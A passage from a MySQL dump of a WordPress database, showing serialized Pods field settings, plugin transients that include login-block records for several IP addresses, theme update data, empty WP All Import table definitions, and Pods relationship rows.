8:\"built_in_post_types_ocean_posts_slider\";s:1:\"0\";s:35:\"built_in_post_types_oceanwp_library\";s:1:\"0\";s:32:\"built_in_post_types_oembed_cache\";s:1:\"0\";s:24:\"built_in_post_types_page\";s:1:\"0\";s:24:\"built_in_post_types_post\";s:1:\"0\";s:36:\"built_in_post_types_project_resource\";s:1:\"1\";s:33:\"built_in_post_types_related_topic\";s:1:\"1\";s:32:\"built_in_post_types_user_request\";s:1:\"0\";s:28:\"built_in_post_types_wp_block\";s:1:\"0\";s:27:\"built_in_post_types_wpforms\";s:1:\"0\";s:31:\"built_in_post_types_wpforms_log\";s:1:\"0\";s:30:\"built_in_post_types_attachment\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_location\";s:7:\"default\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:13:\"show_tagcloud\";s:1:\"1\";s:21:\"show_tagcloud_in_edit\";s:1:\"1\";s:18:\"show_in_quick_edit\";s:1:\"1\";s:17:\"show_admin_column\";s:1:\"0\";s:11:\"pfat_enable\";s:1:\"0\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:19:\"pfat_append_archive\";s:6:\"append\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:33:\"built_in_post_types_related_theme\";s:1:\"1\";s:33:\"built_in_post_types_inst_resource\";s:1:\"1\";s:32:\"built_in_post_types_mea_resource\";s:1:\"1\";s:36:\"built_in_post_types_knowledge_broker\";s:1:\"0\";s:31:\"built_in_post_types_institution\";s:1:\"0\";s:33:\"built_in_post_types_ekms_bulletin\";s:1:\"0\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:11:{s:7:\"term_id\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"term_id\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:2:{i:0;s:2:\"id\";i:1;s:2:\"ID\";}s:20:\"hide_in_default_form\";b:1;}s:4:\"name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"name\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:5:\"title\";}}s:4:\"slug\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"slug\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:9:\"permalink\";}}s:11:\"description\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"description\";s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:8:\"taxonomy\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"taxonomy\";s:5:\"label\";s:8:\"Taxonomy\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}}s:6:\"parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:16:\"term_taxonomy_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:16:\"term_taxonomy_id\";s:5:\"label\";s:16:\"Term Taxonomy ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"term_group\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_group\";s:5:\"label\";s:10:\"Term Group\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:5:\"group\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:5:\"count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:5:\"count\";s:5:\"label\";s:5:\"Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:9:\"object_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"object_id\";s:5:\"label\";s:9:\"Object ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:10:\"term_order\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_order\";s:5:\"label\";s:10:\"Term Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}}}','off'),(5624512,'_transient_timeout_pods_0f8b9947a2c51950101e19ad2162be91','1782127303','off'),(5624513,'_transient_pods_0f8b9947a2c51950101e19ad2162be91','a:0:{}','off'),(5624723,'_transient_timeout_pods_854310ef65a8194af9e55c583c0029c0','1782135801','off'),(5624724,'_transient_pods_854310ef65a8194af9e55c583c0029c0','a:0:{}','off'),(5630653,'_transient_timeout_pods_64409feddb178970b18a711df6ad831e','1782276299','off'),(5630654,'_transient_pods_64409feddb178970b18a711df6ad831e','a:0:{}','off'),(5644518,'_transient_timeout_jpp_li_f99e69d925a494856c70b309f984a6fe','1782105579','off'),(5644519,'_transient_jpp_li_f99e69d925a494856c70b309f984a6fe','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:44:\"This IP is currently blocked (59.89.154.180)\";s:17:\"seconds_remaining\";i:3590;s:16:\"blocked_attempts\";s:7:\"1671430\";s:6:\"expire\";i:1782105579;}','off'),(5644558,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1782103444;s:7:\"checked\";a:6:{s:10:\"kava-child\";s:5:\"1.0.1\";s:4:\"kava\";s:5:\"2.1.2\";s:16:\"twentytwentyfive\";s:3:\"1.4\";s:16:\"twentytwentyfour\";s:3:\"1.0\";s:17:\"twentytwentythree\";s:3:\"1.3\";s:15:\"twentytwentytwo\";s:3:\"1.2\";}s:8:\"response\";a:4:{s:16:\"twentytwentyfive\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfive\";s:11:\"new_version\";s:3:\"1.5\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfive/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfive.1.5.zip\";s:8:\"requires\";s:3:\"6.7\";s:12:\"requires_php\";s:3:\"7.2\";}s:16:\"twentytwentyfour\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfour\";s:11:\"new_version\";s:3:\"1.5\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfour/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfour.1.5.zip\";s:8:\"requires\";s:3:\"6.4\";s:12:\"requires_php\";s:3:\"7.0\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.6.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.2.1.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:0:{}s:12:\"translations\";a:0:{}}','off'),(5644611,'_site_transient_jet_dashboard_license_expire_check','true','off'),(5644663,'_transient_timeout_jpp_li_14763390afdd7c1d71d3eeb65e79f6bb','1782109859','off'),(5644664,'_transient_jpp_li_14763390afdd7c1d71d3eeb65e79f6bb','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:43:\"This IP is currently blocked (49.43.133.77)\";s:17:\"seconds_remaining\";i:3592;s:16:\"blocked_attempts\";s:7:\"1671437\";s:6:\"expire\";i:1782109859;}','off'),(5644625,'_transient_timeout_jpp_li_4d332080fe55544ae7cde7a316318c69','1782107904','off'),(5644626,'_transient_jpp_li_4d332080fe55544ae7cde7a316318c69','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:44:\"This IP is currently blocked (49.37.146.243)\";s:17:\"seconds_remaining\";i:2665;s:16:\"blocked_attempts\";s:7:\"1671435\";s:6:\"expire\";i:1782107904;}','off'),(5644610,'_site_transient_timeout_jet_dashboard_license_expire_check','1782148019','off'),(5632170,'_transient_timeout_pods_212747a43c2f00eea7d2ee185cfb84cc','1782317646','off'),(5644598,'_transient_timeout_jpp_li_64668bec95c9f33096aff3e796d9c3b9','1782106415','off'),(5644599,'_transient_jpp_li_64668bec95c9f33096aff3e796d9c3b9','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:44:\"This IP is currently blocked (82.102.18.182)\";s:17:\"seconds_remaining\";i:2027;s:16:\"blocked_attempts\";s:7:\"1671432\";s:6:\"expire\";i:1782106415;}','off'),(5644623,'_transient_timeout_jpp_li_089ec44f071004ad17b8986907ce81c7','1782108809','off'),(5644624,'_transient_jpp_li_089ec44f071004ad17b8986907ce81c7','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:44:\"This IP is currently blocked (111.253.92.20)\";s:17:\"seconds_remaining\";i:3586;s:16:\"blocked_attempts\";s:7:\"1671434\";s:6:\"expire\";i:1782108809;}','off');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_pmxi_files`
--

DROP TABLE IF EXISTS `wp_pmxi_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_pmxi_files` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `import_id` bigint(20) unsigned NOT NULL,
  `name` text COLLATE utf8mb4_unicode_ci,
  `path` text COLLATE utf8mb4_unicode_ci,
  `registered_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_pmxi_files`
--

LOCK TABLES `wp_pmxi_files` WRITE;
/*!40000 ALTER TABLE `wp_pmxi_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pmxi_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_pmxi_history`
--

DROP TABLE IF EXISTS `wp_pmxi_history`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_pmxi_history` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `import_id` bigint(20) unsigned NOT NULL,
  `type` enum('manual','processing','trigger','continue','') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `time_run` text COLLATE utf8mb4_unicode_ci,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `summary` text COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_pmxi_history`
--

LOCK TABLES `wp_pmxi_history` WRITE;
/*!40000 ALTER TABLE `wp_pmxi_history` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pmxi_history` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_pmxi_images`
--

DROP TABLE IF EXISTS `wp_pmxi_images`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_pmxi_images` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `attachment_id` bigint(20) unsigned NOT NULL,
  `image_url` varchar(600) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `image_filename` varchar(600) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_pmxi_images`
--

LOCK TABLES `wp_pmxi_images` WRITE;
/*!40000 ALTER TABLE `wp_pmxi_images` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pmxi_images` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_pmxi_imports`
--

DROP TABLE IF EXISTS `wp_pmxi_imports`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_pmxi_imports` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `parent_import_id` bigint(20) NOT NULL DEFAULT '0',
  `name` text COLLATE utf8mb4_unicode_ci,
  `friendly_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `feed_type` enum('xml','csv','zip','gz','') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `path` text COLLATE utf8mb4_unicode_ci,
  `xpath` text COLLATE utf8mb4_unicode_ci,
  `options` longtext COLLATE utf8mb4_unicode_ci,
  `registered_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `root_element` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `processing` tinyint(1) NOT NULL DEFAULT '0',
  `executing` tinyint(1) NOT NULL DEFAULT '0',
  `triggered` tinyint(1) NOT NULL DEFAULT '0',
  `queue_chunk_number` bigint(20) NOT NULL DEFAULT '0',
  `first_import` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `count` bigint(20) NOT NULL DEFAULT '0',
  `imported` bigint(20) NOT NULL DEFAULT '0',
  `created` bigint(20) NOT NULL DEFAULT '0',
  `updated` bigint(20) NOT NULL DEFAULT '0',
  `skipped` bigint(20) NOT NULL DEFAULT '0',
  `deleted` bigint(20) NOT NULL DEFAULT '0',
  `canceled` tinyint(1) NOT NULL DEFAULT '0',
  `canceled_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `failed` tinyint(1) NOT NULL DEFAULT '0',
  `failed_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `settings_update_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `last_activity` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `iteration` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_pmxi_imports`
--

LOCK TABLES `wp_pmxi_imports` WRITE;
/*!40000 ALTER TABLE `wp_pmxi_imports` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pmxi_imports` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_pmxi_posts`
--

DROP TABLE IF EXISTS `wp_pmxi_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_pmxi_posts` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL,
  `import_id` bigint(20) unsigned NOT NULL,
  `unique_key` text COLLATE utf8mb4_unicode_ci,
  `product_key` text COLLATE utf8mb4_unicode_ci,
  `iteration` bigint(20) NOT NULL DEFAULT '0',
  `specified` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_pmxi_posts`
--

LOCK TABLES `wp_pmxi_posts` WRITE;
/*!40000 ALTER TABLE `wp_pmxi_posts` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pmxi_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_pmxi_templates`
--

DROP TABLE IF EXISTS `wp_pmxi_templates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_pmxi_templates` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `options` longtext COLLATE utf8mb4_unicode_ci,
  `scheduled` varchar(64) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` text COLLATE utf8mb4_unicode_ci,
  `content` longtext COLLATE utf8mb4_unicode_ci,
  `is_keep_linebreaks` tinyint(1) NOT NULL DEFAULT '0',
  `is_leave_html` tinyint(1) NOT NULL DEFAULT '0',
  `fix_characters` tinyint(1) NOT NULL DEFAULT '0',
  `meta` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_pmxi_templates`
--

LOCK TABLES `wp_pmxi_templates` WRITE;
/*!40000 ALTER TABLE `wp_pmxi_templates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pmxi_templates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_podsrel`
--

DROP TABLE IF EXISTS `wp_podsrel`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_podsrel` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `pod_id` int(10) unsigned DEFAULT NULL,
  `field_id` int(10) unsigned DEFAULT NULL,
  `item_id` bigint(20) unsigned DEFAULT NULL,
  `related_pod_id` int(10) unsigned DEFAULT NULL,
  `related_field_id` int(10) unsigned DEFAULT NULL,
  `related_item_id` bigint(20) unsigned DEFAULT NULL,
  `weight` smallint(5) unsigned DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `field_item_idx` (`field_id`,`item_id`),
  KEY `rel_field_rel_item_idx` (`related_field_id`,`related_item_id`),
  KEY `field_rel_item_idx` (`field_id`,`related_item_id`),
  KEY `rel_field_item_idx` (`related_field_id`,`item_id`)
) ENGINE=MyISAM AUTO_INCREMENT=617 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_podsrel`
--

LOCK TABLES `wp_podsrel` WRITE;
/*!40000 ALTER TABLE `wp_podsrel` DISABLE KEYS */;
INSERT INTO `wp_podsrel` VALUES (1,419,420,570,0,0,571,0),(3,419,576,570,0,0,1686,0),(4,419,576,1695,0,0,1686,0),(6,419,420,1695,0,0,1696,0),(7,419,576,1697,0,0,1686,0),(9,419,420,1697,0,0,1698,0),(12,419,576,1699,0,0,1694,0),(13,419,420,1699,0,0,1700,0),(16,419,576,1701,0,0,1686,0),(18,419,576,1703,0,0,1686,0),(20,419,420,1703,0,0,1704,0),(21,419,576,1705,0,0,1686,0),(23,419,420,1705,0,0,1706,0),(24,419,576,1707,0,0,1686,0),(26,419,420,1707,0,0,1708,0),(29,419,420,1709,0,0,1710,0),(30,419,576,1711,0,0,1686,0),(32,419,420,1711,0,0,1712,0),(35,419,576,1713,0,0,1691,0),(36,419,420,1713,0,0,1714,0),(39,419,576,1715,0,0,1686,0),(40,419,420,1715,0,0,1716,0),(41,419,576,1718,0,0,1686,0),(43,419,420,1718,0,0,1719,0),(44,419,576,1720,0,0,1686,0),(46,419,420,1720,0,0,1721,0),(47,419,576,1722,0,0,1686,0),(49,419,420,1722,0,0,1723,0),(50,419,576,1724,0,0,1686,0),(52,419,420,1724,0,0,1725,0),(53,419,576,1726,0,0,1686,0),(55,419,420,1726,0,0,1727,0),(56,419,576,1728,0,0,1686,0),(58,419,420,1728,0,0,1729,0),(59,419,576,1730,0,0,1686,0),(61,419,420,1730,0,0,1731,0),(62,419,576,1732,0,0,1686,0),(64,419,420,1732,0,0,1733,0),(65,419,576,1734,0,0,1686,0),(67,419,420,1734,0,0,1736,0),(68,419,576,1737,0,0,1686,0),(70,419,420,1737,0,0,1738,0),(71,419,576,1739,0,0,1686,0),(73,419,420,1739,0,0,1740,0),(74,419,576,1741,0,0,1686,0),(76,419,420,1741,0,0,1742,0),(77,419,576,1743,0,0,1686,0),(79,419,420,1743,0,0,1744,0),(80,419,576,1745,0,0,1686,0),(82,419,420,1745,0,0,1746,0),(83,419,576,1747,0,0,1686,0),(86,419,576,1749,0,0,1686,0),(88,419,420,1749,0,0,1750,0),(89,419,576,1751,0,0,1686,0),(91,419,420,1751,0,0,1752,0),(94,419,576,1766,0,0,1694,0),(95,419,420,1766,0,0,1767,0),(98,419,576,1768,0,0,1691,0),(99,419,420,1768,0,0,1769,0),(102,419,576,1770,0,0,1686,0),(103,419,420,1770,0,0,1771,0),(106,419,576,1772,0,0,1686,0),(107,419,420,1772,0,0,1773,0),(110,419,576,1774,0,0,1694,0),(111,419,420,1774,0,0,1775,0),(114,419,576,1776,0,0,1686,0),(115,419,420,1776,0,0,1777,0),(116,419,576,1778,0,0,1686,0),(118,419,420,1778,0,0,1779,0),(119,419,576,1780,0,0,1686,0),(121,419,420,1780,0,0,1781,0),(122,419,576,1782,0,0,1686,0),(124,419,420,1782,0,0,1783,0),(127,419,576,2063,0,0,1686,0),(129,419,420,2063,0,0,2064,0),(130,419,576,2148,0,0,1686,0),(132,419,420,2148,0,0,2149,0),(133,419,576,2150,0,0,1686,0),(135,419,420,2150,0,0,2151,0),(136,419,576,2152,0,0,1686,0),(138,419,420,2152,0,0,2153,0),(139,419,576,2154,0,0,1686,0),(141,419,420,2154,0,0,2155,0),(142,419,576,2156,0,0,1686,0),(144,419,420,2156,0,0,2157,0),(145,419,576,2159,0,0,1686,0),(147,419,420,2159,0,0,2160,0),(148,419,576,2161,0,0,1686,0),(150,419,420,2161,0,0,2164,0),(153,419,420,2165,0,0,2170,0),(154,419,576,2178,0,0,1686,0),(156,419,420,2178,0,0,2179,0),(157,419,576,2248,0,0,1686,0),(159,419,420,2248,0,0,2249,0),(163,419,576,2252,0,0,1686,0),(165,419,420,2252,0,0,2253,0),(166,419,576,2293,0,0,1686,0),(168,419,420,2293,0,0,2294,0),(169,419,576,2296,0,0,1686,0),(171,419,420,2296,0,0,2295,0),(174,419,420,2297,0,0,2298,0),(177,419,420,2309,0,0,2312,0),(178,2388,2401,2395,0,0,2313,0),(180,2388,2401,2410,0,0,2359,0),(182,2388,2401,2411,0,0,2357,0),(184,2388,2401,2419,0,0,2365,0),(186,2388,2401,2420,0,0,2360,0),(187,419,420,1701,0,0,2554,0),(190,419,420,2609,0,0,2610,0),(192,419,420,2658,0,0,2659,0),(193,419,576,2751,0,0,1686,0),(195,419,420,2751,0,0,2752,0),(196,419,576,1709,0,0,2928,0),(205,419,576,2989,0,0,1686,0),(206,419,420,2989,0,0,2752,0),(207,419,420,2989,0,0,2990,1),(208,419,576,2991,0,0,1686,0),(210,419,420,2991,0,0,2992,0),(211,419,576,2993,0,0,1686,0),(213,419,420,2993,0,0